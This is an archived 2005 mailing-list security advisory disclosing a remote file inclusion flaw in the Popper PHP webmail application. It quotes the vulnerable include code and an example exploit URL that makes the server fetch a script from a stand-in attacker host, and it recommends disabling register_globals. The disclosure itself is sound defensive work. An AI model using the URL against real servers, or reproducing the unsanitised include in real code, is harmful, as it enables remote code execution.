lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon Jun  6 10:52:10 2005
From: ljuranic at lss.hr (Leon Juranic)
Subject: Popper webmail remote code execution
	vulnerability - advisory fix

Hi,

This advisory was already released on http://security.lss.hr, but there was a 
mistake in advisory page that marked vulnerable PHP line as HTML tag, so it wasn't
visible within web browser. That's why b0iler described it as a false positive 
(http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html).
I apologize for our mistake, here is fixed advisory.


----------------------------------------------------------------------------------

					LSS Security Advisory #LSS-2005-06-07
 						http://security.lss.hr



 
Title: Popper webmail remote code execution vulnerability
Advisory ID: LSS-2005-06-07
Date: 2005-06-01
Advisory URL: http://security.lss.hr/index.php?page=details&ID=LSS-2005-06-07
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote
Vendors Status: 7th March, 2005


 
==[ Overview

Popper is a webmail application written in PHP which allows users to read
and send their e-mail messages using a web browser. 
 


==[ Vulnerability

Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script
that can be abused to execute arbitrary code.
Vulnerable code in childwindow.inc.php:
--------
..
<?php
		if(file_exists($form.".toolbar.inc.php")) {
			include($form.".toolbar.inc.php");
		}
?>
..
..
<?php include($form.".form.inc.php");?>
..
--------

To exploit this vulnerability, attacker has to put script like test.form.inc.php 
on www.evilsite.com HTTP server, and call url like this:
http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
Vulnerability can be exploited only if register_globals in php.ini file is set
to 'on'.


 
==[ Affected Version

All popper versions including latest 1.41-r2.


 
==[ Fix

Set register_globals to off.


 
==[ PoC Exploit

No PoC needed.


 
==[ Credits

Credits for this vulnerability goes to Leon Juranic <ljuranic@....hr>.


 
==[ LSS Security Contact
 
LSS Security Team, 

WWW : http://security.lss.hr
E-mail : security@....hr
Tel : +385 1 6129 775

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ